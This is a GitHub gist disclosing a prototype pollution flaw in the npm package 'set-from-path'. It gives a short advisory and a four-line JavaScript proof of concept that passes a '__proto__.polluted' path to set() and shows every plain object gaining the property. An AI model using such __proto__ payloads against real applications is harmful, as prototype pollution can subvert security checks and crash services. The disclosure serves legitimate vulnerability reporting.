miguelafmonteiro/set-from-path_poc.js

Created July 18, 2023 09:26

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/miguelafmonteiro/aff114368a060120e71c4bc3f61f0a70.js"></script>
Save miguelafmonteiro/aff114368a060120e71c4bc3f61f0a70 to your computer and use it in GitHub Desktop.

Download ZIP

Affected versions of this package are vulnerable to Prototype Pollution. The function setInPath() (index.js#5) adds in the target object a nested property specified in the path without checking the provided keys for sensitive properties like __proto__.

Raw

set-from-path_poc.js

	const set = require('set-from-path');

	console.log({}.polluted)
	set.set("__proto__.polluted", "Polluted!", {})
	console.log({}.polluted)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment